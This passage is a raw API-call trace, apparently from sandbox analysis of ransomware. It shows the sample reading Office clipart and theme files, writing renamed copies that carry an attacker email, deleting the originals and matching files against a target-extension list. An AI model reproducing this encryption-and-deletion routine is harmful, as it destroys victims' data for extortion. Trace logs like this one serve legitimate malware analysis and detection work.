files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.051] GetLastError () returned 0x0 [0268.051] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x1750, lpOverlapped=0x0) returned 1 [0268.052] WriteFile (in: hFile=0x37c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x1760, lpOverlapped=0x0) returned 1 [0268.053] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.053] WriteFile (in: hFile=0x37c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.053] SetEndOfFile (hFile=0x37c) returned 1 [0268.053] CloseHandle (hObject=0x37c) returned 1 [0268.054] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.054] SetEndOfFile (hFile=0x380) returned 1 [0268.484] CloseHandle (hObject=0x380) returned 1 [0268.487] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.701] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid")) returned 1 [0268.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.701] lstrlenW (lpString=".doc") returned 4 [0268.701] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.702] lstrlenW (lpString=".docx") returned 5 [0268.702] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.702] lstrlenW (lpString=".pdf") returned 4 [0268.702] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.702] lstrlenW (lpString=".xls") returned 4 [0268.702] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.702] lstrlenW (lpString=".xlsx") returned 5 [0268.702] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.702] lstrlenW (lpString=".ppt") returned 4 [0268.702] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.702] lstrlenW (lpString=".zip") returned 4 [0268.702] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.702] lstrlenW (lpString=".rar") returned 4 [0268.702] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.702] lstrlenW (lpString=".bz2") returned 4 [0268.702] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.702] lstrlenW (lpString=".7z") returned 3 [0268.702] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.702] lstrlenW (lpString=".dbf") returned 4 [0268.703] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.703] lstrlenW (lpString=".1cd") returned 4 [0268.703] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.703] lstrlenW (lpString=".jpg") returned 4 [0268.703] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.703] lstrlenW (lpString=".doc") returned 4 [0268.703] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.703] lstrlenW (lpString=".docx") returned 5 [0268.703] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.703] lstrlenW (lpString=".pdf") returned 4 [0268.703] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.703] lstrlenW (lpString=".xls") returned 4 [0268.703] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.703] lstrlenW (lpString=".xlsx") returned 5 [0268.703] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.703] lstrlenW (lpString=".ppt") returned 4 [0268.703] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.703] lstrlenW (lpString=".zip") returned 4 [0268.703] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.703] lstrlenW (lpString=".rar") returned 4 [0268.703] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.704] lstrlenW (lpString=".bz2") returned 4 [0268.704] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.704] lstrlenW (lpString=".7z") returned 3 [0268.704] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.704] lstrlenW (lpString=".dbf") returned 4 [0268.704] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.704] lstrlenW (lpString=".1cd") returned 4 [0268.704] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0268.704] lstrlenW (lpString=".jpg") returned 4 [0268.704] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.704] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.704] lstrlenW (lpString="PARNT_06.MID") returned 12 [0268.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.704] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=7768) returned 1 [0268.704] CloseHandle (hObject=0x37c) returned 1 [0268.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid")) returned 0x20 [0268.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0268.894] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.894] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.109] GetLastError () returned 0x0 [0269.109] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x1e58, lpOverlapped=0x0) returned 1 [0269.117] WriteFile (in: hFile=0x2b4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x1e60, lpOverlapped=0x0) returned 1 [0269.118] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.118] SetEndOfFile (hFile=0x2b4) returned 1 [0269.121] CloseHandle (hObject=0x2b4) returned 1 [0269.121] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.121] SetEndOfFile (hFile=0x388) returned 1 [0269.123] CloseHandle (hObject=0x388) returned 1 [0269.123] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.141] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid")) returned 1 [0269.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.160] lstrlenW (lpString=".doc") returned 4 [0269.160] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.160] lstrlenW (lpString=".docx") returned 5 [0269.160] lstrcmpiW (lpString1=".docx", lpString2="6.MID") returned -1 [0269.160] lstrlenW (lpString=".pdf") returned 4 [0269.160] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.160] lstrlenW (lpString=".xls") returned 4 [0269.160] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.160] lstrlenW (lpString=".xlsx") returned 5 [0269.160] lstrcmpiW (lpString1=".xlsx", lpString2="6.MID") returned -1 [0269.160] lstrlenW (lpString=".ppt") returned 4 [0269.160] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.160] lstrlenW (lpString=".zip") returned 4 [0269.160] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.160] lstrlenW (lpString=".rar") returned 4 [0269.160] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.160] lstrlenW (lpString=".bz2") returned 4 [0269.160] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.160] lstrlenW (lpString=".7z") returned 3 [0269.160] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.160] lstrlenW (lpString=".dbf") returned 4 [0269.160] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.160] lstrlenW (lpString=".1cd") returned 4 [0269.160] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.160] lstrlenW (lpString=".jpg") returned 4 [0269.160] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.161] lstrlenW (lpString=".doc") returned 4 [0269.161] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.161] lstrlenW (lpString=".docx") returned 5 [0269.161] lstrcmpiW (lpString1=".docx", lpString2="6.MID") returned -1 [0269.161] lstrlenW (lpString=".pdf") returned 4 [0269.161] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.161] lstrlenW (lpString=".xls") returned 4 [0269.161] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.161] lstrlenW (lpString=".xlsx") returned 5 [0269.161] lstrcmpiW (lpString1=".xlsx", lpString2="6.MID") returned -1 [0269.161] lstrlenW (lpString=".ppt") returned 4 [0269.161] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.161] lstrlenW (lpString=".zip") returned 4 [0269.161] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.161] lstrlenW (lpString=".rar") returned 4 [0269.161] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.161] lstrlenW (lpString=".bz2") returned 4 [0269.161] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.161] lstrlenW (lpString=".7z") returned 3 [0269.161] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.161] lstrlenW (lpString=".dbf") returned 4 [0269.162] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.162] lstrlenW (lpString=".1cd") returned 4 [0269.162] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63 [0269.162] lstrlenW (lpString=".jpg") returned 4 [0269.162] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.162] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0269.162] lstrlenW (lpString="SWEST_01.MID") returned 12 [0269.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.195] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=8501) returned 1 [0269.195] CloseHandle (hObject=0x2b4) returned 1 [0269.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid")) returned 0x20 [0269.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.254] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.254] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.254] GetLastError () returned 0x0 [0269.254] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x2135, lpOverlapped=0x0) returned 1 [0269.256] WriteFile (in: hFile=0x384, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x2140, lpOverlapped=0x0) returned 1 [0269.257] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.257] WriteFile (in: hFile=0x384, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.257] SetEndOfFile (hFile=0x384) returned 1 [0269.257] CloseHandle (hObject=0x384) returned 1 [0269.257] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.257] SetEndOfFile (hFile=0x388) returned 1 [0269.260] CloseHandle (hObject=0x388) returned 1 [0269.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.260] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid")) returned 1 [0269.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.261] lstrlenW (lpString=".doc") returned 4 [0269.261] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.261] lstrlenW (lpString=".docx") returned 5 [0269.261] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.261] lstrlenW (lpString=".pdf") returned 4 [0269.261] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.261] lstrlenW (lpString=".xls") returned 4 [0269.261] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.261] lstrlenW (lpString=".xlsx") returned 5 [0269.261] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.261] lstrlenW (lpString=".ppt") returned 4 [0269.261] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.261] lstrlenW (lpString=".zip") returned 4 [0269.261] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.261] lstrlenW (lpString=".rar") returned 4 [0269.261] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.261] lstrlenW (lpString=".bz2") returned 4 [0269.261] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.261] lstrlenW (lpString=".7z") returned 3 [0269.261] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.261] lstrlenW (lpString=".dbf") returned 4 [0269.261] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.262] lstrlenW (lpString=".1cd") returned 4 [0269.262] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.262] lstrlenW (lpString=".jpg") returned 4 [0269.262] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.262] lstrlenW (lpString=".doc") returned 4 [0269.262] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.262] lstrlenW (lpString=".docx") returned 5 [0269.262] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.262] lstrlenW (lpString=".pdf") returned 4 [0269.262] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.262] lstrlenW (lpString=".xls") returned 4 [0269.262] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.262] lstrlenW (lpString=".xlsx") returned 5 [0269.262] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.262] lstrlenW (lpString=".ppt") returned 4 [0269.262] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.262] lstrlenW (lpString=".zip") returned 4 [0269.262] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.262] lstrlenW (lpString=".rar") returned 4 [0269.262] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.262] lstrlenW (lpString=".bz2") returned 4 [0269.263] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.263] lstrlenW (lpString=".7z") returned 3 [0269.263] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.263] lstrlenW (lpString=".dbf") returned 4 [0269.263] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.263] lstrlenW (lpString=".1cd") returned 4 [0269.263] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0269.263] lstrlenW (lpString=".jpg") returned 4 [0269.263] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.263] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.263] lstrlenW (lpString="Adjacency.eftx") returned 14 [0269.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.268] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=21089) returned 1 [0269.268] CloseHandle (hObject=0x388) returned 1 [0269.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx")) returned 0x20 [0269.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.268] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.268] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.281] GetLastError () returned 0x0 [0269.281] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x5261, lpOverlapped=0x0) returned 1 [0269.287] WriteFile (in: hFile=0x348, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x5270, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x5270, 